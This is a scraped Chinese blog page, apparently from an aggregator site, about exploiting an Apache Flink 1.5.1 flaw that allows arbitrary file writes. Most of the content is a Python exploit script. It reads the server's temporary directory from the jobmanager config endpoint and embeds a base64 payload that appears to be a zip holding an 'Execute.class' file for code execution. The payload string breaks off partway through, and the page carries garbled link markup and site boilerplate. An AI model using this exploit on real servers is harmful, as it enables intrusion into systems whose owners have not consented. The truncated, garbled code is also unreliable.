利用CVE

编程入门行业动态更新时间:2024-10-22 21:18:18

利用<a href=https://www.elefans.com/category/jswz/34/1768773.html style= CVE"/>

利用CVE

漏洞描述

Apache Flink 1.5.1引入了一个REST处理程序，允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置

漏洞利用

import requests
import json
import base64#获取tmpdir的路径
url = "http://ip:port"
tmpdir_url = url + '/jobmanager/config'
tmpdir_res = requests.get(tmpdir_url)
tmpdir = json.loads(tmpdir_res.text)[7]['value']
print(tmpdir)
#将payload做base64解码
payload = "UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdH

更多推荐

利用CVE

本文发布于:2024-03-10 20:14:50，感谢您对本站的认可！

本文链接:https://www.elefans.com/category/jswz/34/1728929.html